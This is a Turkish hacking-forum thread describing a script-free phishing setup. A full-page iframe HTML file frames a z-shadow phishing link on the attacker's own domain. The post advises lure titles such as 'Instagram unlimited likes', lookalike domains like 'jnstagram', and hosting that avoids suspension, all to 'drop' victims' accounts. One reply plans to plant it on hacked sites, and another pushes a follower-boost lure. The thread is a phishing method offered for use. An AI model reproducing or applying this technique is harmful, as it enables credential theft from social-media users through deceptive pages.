Scriptsiz fake site yapma

Merhaba arkadaşlar bu konumda sizlere nasıl script falan olmadan sadece ftpden index.html atarak fake script yaparsınız onu göstereceğim. Bunu göstermemin sebebi z-shadow gibi...

Merhaba arkadaşlar bu konumda sizlere nasıl script falan olmadan sadece ftpden index.html atarak fake script yaparsınız onu göstereceğim.
Bunu göstermemin sebebi z-shadow gibi sitelerden aldığınız link değişik değişik bir domain oluyor biz bunu kendi domainimizde iframe kodu ekleyerek yansıtacağız ve eğer domaininiz güzelse hesap düşürme şansınız artacaktır.

İframe kodu:
HTML:
<!DOCTYPE html>
<html>
<head>
    <title>Tam Sayfa İframe Kodu</title>
</head>
<body>
<iframe src="http://youtube.com" style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">
</iframe>   
</body>
</html>

<iframe src=kısmına tırnak arasına sitemizin adresini yazacağız ve title yani sayfa başlığını instagram sınırsız beğeni vb yazacaksınız kendim denedim suspend yemem dışında bir sıkıntı çıkmadı :D
suspend atmayan bir hosting biliyorsanız orada kullanabilirsiniz domaini jnstagram gibi birşey yapabilirsiniz size kalmış inandırıcı olması yeterli ha eğer ben her türlü düşürürüm diyorsanız direk zshadow link atın :D

İyi forumlar.

not:kodu 2014 de paylaşılan bir siteden buldum xd yani bilmeyen yoktur falan demeyin bilmeyenler olabilir.

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
ben hacklediğim sitelere koycam Xd altada yazcam

GİRİN VE 1K TAKİPÇİ KASIN !!!

NOT YAZACAĞINIZ HESABIN KESİNLİKLE YENİ OLMAMASI LAZIMDIR YOKSA BOT GELMEZ !!!

💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
132,607Konular
3,282,668Mesajlar
317,816Kullanıcılar
kaaznxnzSon Üye
Üst Alt